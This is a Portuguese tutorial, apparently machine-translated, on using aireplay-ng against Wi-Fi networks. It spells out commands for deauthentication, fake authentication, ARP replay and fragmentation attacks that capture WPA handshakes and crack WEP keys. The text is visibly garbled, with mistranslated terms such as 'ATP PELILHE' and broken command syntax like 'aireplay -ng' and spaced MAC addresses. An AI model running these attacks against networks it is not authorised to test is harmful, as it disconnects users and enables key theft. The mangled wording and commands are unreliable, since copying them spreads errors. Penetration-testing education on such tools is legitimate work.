Aireplay-ng

Aireplay-ng

Aireplay-ng é usado para gerar tráfego sem fio desonesto. Pode ser usado junto com o Aircrack-ng para quebrar as teclas WEP e WPA. O principal objetivo do Aireplay-NG é injetar quadros. Existem vários tipos diferentes de ataques poderosos que podem ser executados usando o AirePlay-NG, como o ataque de desacenticação, que ajuda a capturar dados de handshake de mão WPA, ou o ataque de autenticação falsa, no qual os pacotes são injetados no ponto de acesso à rede, autenticando para para criar e capturar novos IVs. Outros tipos de ataques estão incluídos na lista a seguir:

  • Ataque interativo de reprodução de pacotes
  • ATP PELILHE
  • Ataque de Korek Chopchop
  • Ataque de Cafe-Latte
  • Ataque de fragmentação

Uso do Aireplay-ng

Teste de injeção

Certas cartões de rede não suportam injeção de pacotes, e a Aireplay-NG funciona apenas com cartões de rede que suportam esse recurso. A primeira coisa a fazer antes de realizar um ataque é verificar se o seu cartão de rede suporta injeção. Você pode fazer isso simplesmente executando um teste de injeção usando o seguinte comando:

ubuntu@ubuntu: ~ $ sudo aireplay -ng -9 wlan0


-9 : Teste de injeção (-teste também pode ser usado)

WLAN0: Nome da interface de rede

Aqui, você pode ver que encontramos 1 AP (ponto de acesso), nomeado PTCL-BB, a interface usada, o tempo de ping e o canal em que está funcionando. Portanto, podemos determinar claramente analisando a saída que a injeção está funcionando, e somos bons para realizar outros ataques.

Ataque de deautica

O ataque de desacenticação é usado para enviar pacotes de desacenticação para um ou mais clientes que estão conectados a um determinado AP a desaciticar o (s) cliente (s). Ataques de desacenticação podem ser realizados por muitos motivos diferentes, como capturar apertos de mão WPA/WPA2 forçando a vítima a reautenticar, recuperando um essid oculto (nome oculto Wi-Fi), gerando pacotes ARP, etc. O comando a seguir é usado para realizar um ataque de desativação:

Ubuntu@ubuntu: ~ $ sudo aireplay -ng -0 1 -a e4: 6f: 13: 04: CE: 31 -c cc: 79: cf: d6: AC: fc wlan0

-0 : Ataque de desaciticação

1 : Número de pacotes de desativação para enviar

-a : Endereço MAC do AP (roteador sem fio)

-c : Endereço MAC da vítima (se não for especificado, ele desarticará todos os clientes conectados ao AP fornecido)

WLAN0 : Nome da interface de rede

Como você pode ver, desaciticamos com sucesso o sistema com o endereço MAC fornecido que estava conectado apenas um momento antes. Este ataque de desacenticação forçará o cliente especificado a se desconectar e depois se reconectar novamente para capturar o handshake WPA. Este aperto de mão WPA pode ser quebrado pelo Aircrack-NG mais tarde.

Se você não especificar a opção '-C' no comando acima, a Aireplay-NG forçará todos os dispositivos nesse roteador sem fio (AP) a se desconectar enviando pacotes de desaceticação falsa.

Ataque de autenticação falsa (WEP)

Suponha que você precise injetar pacotes em um AP (roteador sem fio), mas você não tem seu dispositivo cliente associado ou autenticado a ele (isso só funciona no caso do WEP Security Protocol). APS contém uma lista de todos os clientes e dispositivos conectados e eles ignoram qualquer outro pacote proveniente de qualquer outra fonte. Nem se preocupará em ver o que está dentro do pacote. Para resolver esse problema, você autenticará seu sistema para o roteador ou AP fornecido através de um método chamado autenticação falsa. Você pode executar esta ação usando os seguintes comandos:

ubuntu@ubuntu: ~ $ sudo aireplay -ng -1 0 -a e4: 6f: 13: 04: CE: 31 -H CC: 70: cf: d8: ad: fc wlan0

-1 : Ataque de autenticação falsa (-fakeauth também pode ser usado)

-a : Endereço MAC de ponto de acesso

-h : Endereço MAC do dispositivo para executar autenticação falsa

WLAN0 : Nome da interface de rede

Na saída acima, você verá que a solicitação de autenticação foi bem -sucedida e a rede agora se tornou uma rede aberta para nós. Como você pode ver, o dispositivo não está conectado ao AP fornecido, mas sim, autenticado para isso. Isso significa que os pacotes agora podem ser injetados no AP especificado, como agora somos autenticados, e receberá qualquer solicitação que enviaremos.

ATP PEDIDO REPAY ATACT (WEP)

A melhor e mais confiável maneira de produzir novos vetores de inicialização é o ATP PELILHE. Esse tipo de ataque espera e ouve um pacote ARP e, ao obter o pacote, transmite o pacote de volta. Ele continuará a retransmitir os pacotes ARP de volta e novamente. Em cada caso, será gerado um novo IV, o que mais tarde ajuda a quebrar ou determinar a tecla WEP. Os seguintes comandos serão usados ​​para executar este ataque:

Ubuntu@ubuntu: ~ $ sudo aireplay -ng -3 -b e4: 6f: 13: 04: CE: 31 -H CC: 70: cf: d8: ad: fc wlan0

-3 :-arpreplay também pode ser usado)

-b : Endereço MAC de AP

-h : Endereço MAC do dispositivo para o qual a autenticação falsa deve ser enviada

WLAN0 : Nome da interface de rede

Agora, vamos esperar por um pacote ARP do AP sem fio. Em seguida, capturaremos o pacote e o injetaremos na interface especificada.

Isso produz um pacote ARP e deve ser injetado de volta, o que pode ser feito usando o seguinte comando:

ubuntu@ubuntu: ~ sudo aireplay-ng -2 -r arp-0717-135835.Cap wlan0

-2 : Seleção de quadros interativos

-r : Nome do arquivo da última reprodução de pacote bem -sucedida

WLAN0: Nome da interface de rede

Aqui, o Airodump-NG será iniciado para capturar os IVs, primeiro colocando a interface no modo de monitor; Enquanto isso, os dados devem começar a aumentar rapidamente.

Ataque de fragmentação (WEP)

Um ataque de fragmentação é usado para obter 1500 bytes de P-R-G-A, em vez de uma chave WEP. Esses 1500 bytes são posteriormente usados ​​por packetForge-ng Para realizar vários ataques de injeção. É necessário um mínimo de um pacote obtido do AP para obter esses 1500 bytes (e às vezes menos). Os seguintes comandos são usados ​​para executar esse tipo de ataque:

ubuntu@ubuntu: ~ $ sudo aireplay -ng -5 -b e4: 6f: 13: 04: CE: 31 -H CC: 70: cf: d8: ad: fc wlan0

-5 : Ataque de fragmentação

-b : Endereço MAC de AP

-h : Endereço MAC do dispositivo do qual os pacotes serão injetados

WLAN0 : Nome da interface de rede


Depois de capturar o pacote, ele perguntará se deve usar este pacote para obter os 1500 bytes de PRGA. Imprensa Y continuar.

Agora nós, os 1500 bytes de PRGA, fomos obtidos com sucesso. Esses bytes são armazenados em um arquivo.

Conclusão

AirePlay-NG é uma ferramenta útil que ajuda a quebrar as teclas WPA/WPA2-PSK e WEP, realizando vários ataques poderosos em redes sem fio. Dessa forma, a Aireplay-NG gera dados de tráfego importantes a serem usados ​​posteriormente. A Aireplay-NG também vem com aircrack-ng, uma suíte de software muito poderosa que consiste em um detector, um sniffer e as ferramentas de rachaduras e rachaduras WPA e WEP/WPS.